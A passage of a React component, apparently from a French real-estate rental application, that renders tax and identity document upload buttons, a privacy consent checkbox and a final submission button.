                          <h4 className="font-medium text-orpi-secondary">{doc.title}</h4>
                          <p className="text-sm text-gray-600">
                            {doc.description}
                          </p>
                          
                          {renderTaxFiles()}
                        </div>
                        <div>
                          <input
                            type="file"
                            id={`tax-${doc.id}`}
                            onChange={(e) => handleTaxFilesChange(e, doc.id)}
                            className="hidden"
                            accept={doc.accept}
                            multiple
                            ref={el => fileInputRefs.current[`tax-${doc.id}`] = el}
                          />
                          <button 
                            type="button" 
                            onClick={() => fileInputRefs.current[`tax-${doc.id}`].click()}
                            className={`flex items-center px-4 py-2 ${
                              taxFiles.length >= 5
                                ? 'bg-gray-400 cursor-not-allowed'
                                : 'bg-orpi-primary hover:bg-orpi-dark'
                            } text-white rounded`}
                            disabled={taxFiles.length >= 5}
                          >
                            <Upload className="w-4 h-4 mr-2" />
                            {taxFiles.length > 0 ? 'Ajouter' : 'Sélectionner'}
                          </button>
                        </div>
                      </div>
                      
                      {taxFiles.length > 0 && (
                        <div className="mt-2 text-xs text-gray-500">
                          {taxFiles.length === 1 ? '1 fichier sélectionné' : 
                            taxFiles.length >= 5 ? '5 fichiers sélectionnés (maximum)' : 
                            `${taxFiles.length} fichiers sélectionnés`}
                        </div>
                      )}
                    </div>
                  );
                }
                
                // Documents standards
                return (
                  <div key={doc.id} className="border rounded-lg p-4 bg-white">
                    <div className="flex justify-between items-start mb-3">
                      <div>
                        <h4 className="font-medium text-orpi-secondary">{doc.title}</h4>
                        <p className="text-sm text-gray-600">
                          {doc.description}
                        </p>
                        
                        {renderUploadStatus(doc.id)}
                      </div>
                      <div>
                        <input
                          type="file"
                          id={`file-${doc.id}`}
                          onChange={(e) => handleFileChange(e, doc)}
                          className="hidden"
                          accept={doc.accept}
                          ref={el => fileInputRefs.current[`standard-${doc.id}`] = el}
                        />
                        <button 
                          type="button" 
                          onClick={() => fileInputRefs.current[`standard-${doc.id}`].click()}
                          className={`flex items-center px-4 py-2 ${
                            uploads[doc.id]?.status === 'completed'
                              ? 'bg-gray-400 cursor-not-allowed'
                              : uploads[doc.id]?.status === 'uploading'
                                ? 'bg-orpi-light text-orpi-primary cursor-not-allowed'
                                : 'bg-orpi-primary hover:bg-orpi-dark'
                          } text-white rounded`}
                          disabled={uploads[doc.id]?.status === 'uploading' || uploads[doc.id]?.status === 'completed'}
                        >
                          {uploads[doc.id]?.status === 'completed' ? (
                            <>
                              <CheckCircle className="w-4 h-4 mr-2" />
                              Déposé
                            </>
                          ) : (
                            <>
                              <Upload className="w-4 h-4 mr-2" />
                              {uploads[doc.id]?.status === 'uploading' ? 'En cours...' : 'Déposer'}
                            </>
                          )}
                        </button>
                      </div>
                    </div>
                  </div>
                );
              })}
            </div>
          ))}

          <div className="mt-8 p-4 bg-orpi-light rounded-lg">
            <p className="text-sm text-orpi-secondary">
              Une fois tous vos documents déposés, votre dossier sera étudié par nos équipes 
              dans les meilleurs délais. Vous recevrez une notification par email dès que 
              votre dossier aura été traité.
            </p>
          </div>

          {/* Bloc de consentement déplacé juste avant le bouton de finalisation */}
          <div className="mt-6 p-4 bg-gray-50 rounded-lg">
            <label className="flex items-start">
              <input
                type="checkbox"
                checked={consent}
                onChange={(e) => setConsent(e.target.checked)}
                className="mt-1 mr-2"
              />
              <span className="text-sm text-gray-600">
                J'ai lu et j'accepte la <a href="/politique-confidentialite" className="text-orpi-primary hover:underline" target="_blank" rel="noopener noreferrer">politique de confidentialité</a> et les <a href="/conditions-utilisation" className="text-orpi-primary hover:underline" target="_blank" rel="noopener noreferrer">conditions d'utilisation</a> du service. Je consens à ce que mes données personnelles soient traitées conformément à ces documents.
              </span>
            </label>
          </div>

          {/* Bouton de finalisation */}
          <div className="mt-6 flex justify-center">
            <button
              type="button"
              className={`px-8 py-3 rounded-full font-semibold ${
                isSubmitting
                  ? 'bg-gray-400 text-white cursor-not-allowed'
                  : allDocumentsUploaded && consent && instructionsAccepted
                    ? 'bg-orpi-primary hover:bg-orpi-dark text-white'
                    : 'bg-gray-300 text-gray-500 cursor-not-allowed'
              }`}
              disabled={isSubmitting || !allDocumentsUploaded || !consent || !instructionsAccepted}
              onClick={handleFinalSubmit}
            >
              {isSubmitting ? (
                <>
                  <Loader className="w-5 h-5 mr-2 inline animate-spin" />
                  Envoi en cours...
                </>
              ) : (
                'Finaliser ma demande'
              )}
            </button>
          </div>
          
          {/* Message informatif */}
          {allDocumentsUploaded && consent && (
            <div className="mt-4 text-xs text-center text-gray-500">
              Le processus d'envoi peut prendre quelques instants. Merci de ne pas fermer cette page jusqu'à la confirmation.
            </div>
          )}
        </div>
      ) : (
        <div className="text-center text-gray-600 p-8 border-2 border-dashed rounded-lg">
          <p>Veuillez sélectionner un type de pièce d'identité pour continuer</p>
        </div>
      )}
    </div>
  );
};

export default StepFinal;